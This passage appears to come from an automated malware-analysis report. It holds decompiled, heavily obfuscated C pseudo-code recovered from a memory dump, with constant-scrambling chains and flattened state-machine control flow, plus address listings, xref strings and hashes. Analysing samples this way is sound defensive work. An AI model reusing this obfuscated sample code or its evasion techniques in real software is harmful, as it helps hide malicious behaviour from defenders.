				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00242674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00248C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00238736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x24c7a0);
					_push(_v208);
					E00237F4B(_t521, E0024878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00242025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0023EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0023B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0023EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0023B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x24c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002311C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0024878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00242025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}

0x0024511b
0x0024511b
0x00245125
0x0024512c
0x00245133
0x0024513b
0x00245146
0x0024514e
0x00245156
0x0024515e
0x00245163
0x0024516b
0x00245176
0x0024517e
0x00245189
0x00245191
0x00245196
0x0024519e
0x002451a6
0x002451ae
0x002451b6
0x002451be
0x002451c3
0x002451cb
0x002451d0
0x002451d8
0x002451e0
0x002451e9
0x002451f2
0x002451f7
0x002451fd
0x00245205
0x00245218
0x0024521b
0x0024521e
0x00245225
0x00245230
0x00245238
0x00245240
0x00245248
0x00245250
0x00245258
0x00245260
0x00245265
0x0024526d
0x00245275
0x00245280
0x00245288
0x00245293
0x002452a0
0x002452a4
0x002452b1
0x002452b5
0x002452bd
0x002452c8
0x002452d3
0x002452de
0x002452e6
0x002452f0
0x002452f4
0x002452fc
0x00245306
0x00245312
0x00245317
0x0024531d
0x00245322
0x0024532a
0x00245332
0x0024533a
0x0024533f
0x00245344
0x0024534c
0x00245354
0x0024535c
0x00245361
0x00245369
0x00245371
0x00245379
0x00245381
0x0024538b
0x0024538e
0x00245392
0x0024539a
0x002453a5
0x002453b0
0x002453bb
0x002453c6
0x002453ce
0x002453d9
0x002453e4
0x002453ec
0x002453f7
0x002453ff
0x00245407
0x0024540f
0x00245417
0x0024541f
0x00245427
0x0024542f
0x0024543c
0x00245440
0x00245445
0x0024544d
0x00245455
0x0024545d
0x00245465
0x0024546d
0x00245475
0x00245480
0x00245488
0x00245493
0x0024549b
0x002454a3
0x002454b0
0x002454b4
0x002454bc
0x002454c8
0x002454cd
0x002454d3
0x002454db
0x002454e3
0x002454eb
0x002454f4
0x002454f7
0x002454fb
0x00245503
0x0024550b
0x00245513
0x0024551b
0x00245525
0x00245530
0x00245538
0x00245543
0x0024554e
0x00245559
0x00245564
0x00245573
0x0024557a
0x0024557e
0x00245586
0x0024558e
0x0024559b
0x0024559f
0x002455a7
0x002455af
0x002455bc
0x002455c8
0x002455cf
0x002455d3
0x002455db
0x002455e3
0x002455eb
0x002455f3
0x002455fb
0x00245603
0x00245619
0x00245620
0x0024562b
0x0024563e
0x00245641
0x00245648
0x00245653
0x0024565e
0x00245666
0x00245671
0x00245687
0x0024568e
0x00245699
0x002456a1
0x002456ad
0x002456b0
0x002456b7
0x002456bb
0x002456c3
0x002456d6
0x002456dd
0x002456e8
0x002456f0
0x002456f8
0x00245700
0x00245708
0x00245710
0x00245722
0x00245848
0x0024584d
0x00245854
0x00245857
0x0024585c
0x00000000
0x0024585c
0x0024572e
0x00245817
0x00245821
0x00000000
0x00245821
0x0024573a
0x00245806
0x0024580d
0x002457ea
0x002457ea
0x00000000
0x002457ea
0x00245746
0x002457c7
0x002457c8
0x002457d1
0x002457d3
0x002457d8
0x002457da
0x00245998
0x00245998
0x00000000
0x00245998
0x002457e3
0x002457e8
0x002457e8
0x00000000
0x002457e8
0x00245748
0x0024574e
0x0024598c
0x0024598c
0x00245992
0x00000000
0x00000000
0x00000000
0x00245992
0x00245754
0x00245759
0x00245792
0x002457ab
0x00000000
0x002457b5
0x002458a2
0x002458a7
0x002458b0
0x002458c3
0x002458ef
0x002458f4
0x002458f9
0x002458fe
0x00245913
0x0024596b
0x0024596b
0x00245978
0x0024597d
0x00245984
0x00245987
0x00000000

Strings

o^, xrefs: 00245465
y5, xrefs: 00245493
*T, xrefs: 002453F7
c, xrefs: 002456DD
OD, xrefs: 0024562B
p!,, xrefs: 00245708
t:, xrefs: 00245488
'v, xrefs: 00245417
%, xrefs: 00245293
0), xrefs: 00245189
r{, xrefs: 00245275
pv, xrefs: 002458B0
=i, xrefs: 0024568E
|uQa, xrefs: 002451D0

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
API String ID: 0-2620103065
Opcode ID: 3d7e032fbf91e61429af105e81e8f065e611736050ffc5f29b04d4394e611f4f
Instruction ID: 618da252c70ab019f5b47d86f838cc0a577455b003744142f3b1ac404a88b6d4
Opcode Fuzzy Hash: 3d7e032fbf91e61429af105e81e8f065e611736050ffc5f29b04d4394e611f4f
Instruction Fuzzy Hash: 04222371508380DFE368CF25C58AA8BFBE1BBC4748F108A1DE5D9962A1D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00234A35, Relevance: 16.7, Strings: 13, Instructions: 468
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00234A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00246D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0023F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0023F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00241773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0023568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002329E3( &_v524, 0x104, E0024889D(0x24c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00242025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00244F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00238736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0023C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0023F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0024388A();
								_t479 = E00240ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0023B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002380BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002388E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x24c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x24ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x24ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}

0x00234a3b
0x00234a46
0x00234a51
0x00234a5c
0x00234a64
0x00234a6c
0x00234a71
0x00234a79
0x00234a81
0x00234a8c
0x00234a94
0x00234a9f
0x00234aaa
0x00234ab2
0x00234abd
0x00234ad3
0x00234ada
0x00234ae3
0x00234aea
0x00234aef
0x00234af8
0x00234b03
0x00234b0b
0x00234b13
0x00234b1b
0x00234b23
0x00234b35
0x00234b3a
0x00234b43
0x00234b4e
0x00234b5a
0x00234b5d
0x00234b61
0x00234b69
0x00234b71
0x00234b79
0x00234b81
0x00234b85
0x00234b8d
0x00234b98
0x00234ba0
0x00234bab
0x00234bb6
0x00234bc1
0x00234bcc
0x00234bd4
0x00234bdc
0x00234be4
0x00234bec
0x00234bf4
0x00234bff
0x00234c0a
0x00234c15
0x00234c20
0x00234c28
0x00234c33
0x00234c3e
0x00234c49
0x00234c54
0x00234c67
0x00234c6e
0x00234c79
0x00234c81
0x00234c89
0x00234c8e
0x00234c98
0x00234ca8
0x00234cae
0x00234cb6
0x00234cbb
0x00234cc3
0x00234cce
0x00234cd9
0x00234ce4
0x00234cec
0x00234cf1
0x00234cf9
0x00234d01
0x00234d09
0x00234d14
0x00234d1f
0x00234d2a
0x00234d32
0x00234d37
0x00234d3f
0x00234d47
0x00234d4f
0x00234d57
0x00234d5f
0x00234d67
0x00234d6f
0x00234d77
0x00234d80
0x00234d85
0x00234d8b
0x00234d93
0x00234d9e
0x00234da9
0x00234db4
0x00234dbc
0x00234dc4
0x00234dc9
0x00234dd1
0x00234dd9
0x00234de5
0x00234de8
0x00234dec
0x00234df4
0x00234dfc
0x00234e04
0x00234e09
0x00234e0e
0x00234e16
0x00234e21
0x00234e29
0x00234e34
0x00234e3c
0x00234e44
0x00234e49
0x00234e51
0x00234e64
0x00234e6b
0x00234e76
0x00234e7e
0x00234e86
0x00234e8e
0x00234e96
0x00234e9e
0x00234ea6
0x00234eae
0x00234eb6
0x00234ec1
0x00234ecc
0x00234ed7
0x00234ee4
0x00234eef
0x00234efa
0x00234f02
0x00234f0a
0x00234f12
0x00234f1a
0x00234f22
0x00234f27
0x00234f2c
0x00234f34
0x00234f3c
0x00234f4a
0x00234f4f
0x00234f5a
0x00234f5b
0x00234f5f
0x00234f67
0x00234f72
0x00234f7d
0x00234f88
0x00234f93
0x00234f9e
0x00234fa9
0x00234fb4
0x00234fbf
0x00234fca
0x00234fd7
0x00234fdb
0x00234fe3
0x00234fe8
0x00234ff0
0x00234ffb
0x00235003
0x0023500e
0x00235019
0x00235021
0x0023502c
0x00235034
0x0023503c
0x00235044
0x00235049
0x00235051
0x00235059
0x00235063
0x00235067
0x0023506f
0x00235077
0x00235082
0x0023508d
0x00235098
0x002350a0
0x002350a5
0x002350ad
0x002350b5
0x002350c0
0x002350cb
0x002350d6
0x002350e1
0x002350ee
0x002350f2
0x002350fa
0x00235102
0x0023510a
0x00235118
0x00235121
0x00235125
0x0023512d
0x00235135
0x0023513d
0x00235142
0x00235155
0x0023515a
0x00235161
0x00235163
0x0023516a
0x0023516a
0x0023516a
0x0023516f
0x0023516f
0x0023516f
0x0023516f
0x00235175
0x00000000
0x00000000
0x0023517b
0x00000000
0x002354f8
0x00235187
0x00235193
0x002352e9
0x002352ef
0x002352f0
0x0023516a
0x0023516a
0x0023516a
0x00000000
0x0023516a
0x00235199
0x0023519f
0x002352ad
0x002352b8
0x002352bd
0x002352bf
0x002352c2
0x002352c9
0x002352ce
0x00000000
0x002351a5
0x002351ab
0x0023525c
0x0023525d
0x0023526d
0x0023526f
0x00235277
0x00235279
0x0023527d
0x00235284
0x00235285
0x0023528a
0x0023528d
0x0023516a
0x0023516a
0x0023516a
0x00000000
0x0023516a
0x002351b1
0x002351b3
0x002351e0
0x0023522f
0x00235234
0x0023524b
0x00235251
0x00235252
0x0023516a
0x0023516a
0x0023516a
0x00000000
0x0023516a
0x002351b5
0x002351bb
0x00000000
0x002351c1
0x002351d3
0x002351d8
0x002351d9
0x0023516a
0x0023516a
0x0023516a
0x00000000
0x0023516a
0x0023516a
0x002351bb
0x002351b3
0x002351ab
0x0023519f
0x002353b2
0x002353b2
0x002353b2
0x0023530c
0x00235310
0x00235311
0x00235316
0x00235319
0x0023531a
0x0023531c
0x00235322
0x00235323
0x00235342
0x0023534a
0x0023534f
0x00235352
0x0023516a
0x0023516a
0x0023516a
0x00000000
0x0023516a
0x0023516a
0x00000000
0x0023531c
0x0023535c
0x00235362
0x002354bd
0x002354c4
0x002354c9
0x00000000
0x00235368
0x00235368
0x0023536e
0x00235439
0x00235440
0x00235445
0x0023545c
0x00235490
0x00235495
0x0023549a
0x0023549c
0x00000000
0x00235374
0x00235374
0x0023537a
0x00235404
0x0023540c
0x00235414
0x00235415
0x00000000
0x0023537c
0x0023537c
0x00235382
0x002353c8
0x002353ce
0x002353d6
0x002353d8
0x002353d9
0x002353d9
0x002353df
0x002353df
0x0023516a
0x0023516a
0x0023516a
0x00000000
0x0023516a
0x00235384
0x00235384
0x0023538a
0x00235397
0x0023539a
0x0023539f
0x002353a2
0x00000000
0x002353a2
0x00000000
0x0023538a
0x00235382
0x0023537a
0x0023536e
0x00000000
0x002354ce
0x002354ce
0x002354ce
0x00000000
0x0023516f

Strings

-*, xrefs: 00234FB4
e!, xrefs: 00235102
;x, xrefs: 00234D93
WM, xrefs: 00234B8D
`+, xrefs: 00234B4E
U$, xrefs: 0023502C
*X, xrefs: 00234B23
][, xrefs: 0023512D
Kc, xrefs: 00235051
>], xrefs: 00234CE4
P, xrefs: 00234A5C
h=, xrefs: 00234BAB
6T-, xrefs: 00234CD9

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
API String ID: 0-2931794159
Opcode ID: 7a7f98bca30409685479176b5e26eb01061cdbbb124fbbbea39531deb79342f7
Instruction ID: 6ac2d1a0878addcab8fd7abec263e0a08a4fa2bd0025a29fd5845bef419dbaab
Opcode Fuzzy Hash: 7a7f98bca30409685479176b5e26eb01061cdbbb124fbbbea39531deb79342f7
Instruction Fuzzy Hash: E0322371518781CFE3B8CF25C54AA8BBBE1BBC4314F508A1DE5DA962A0D7B59819CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00238F78, Relevance: 15.4, Strings: 12, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00238F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
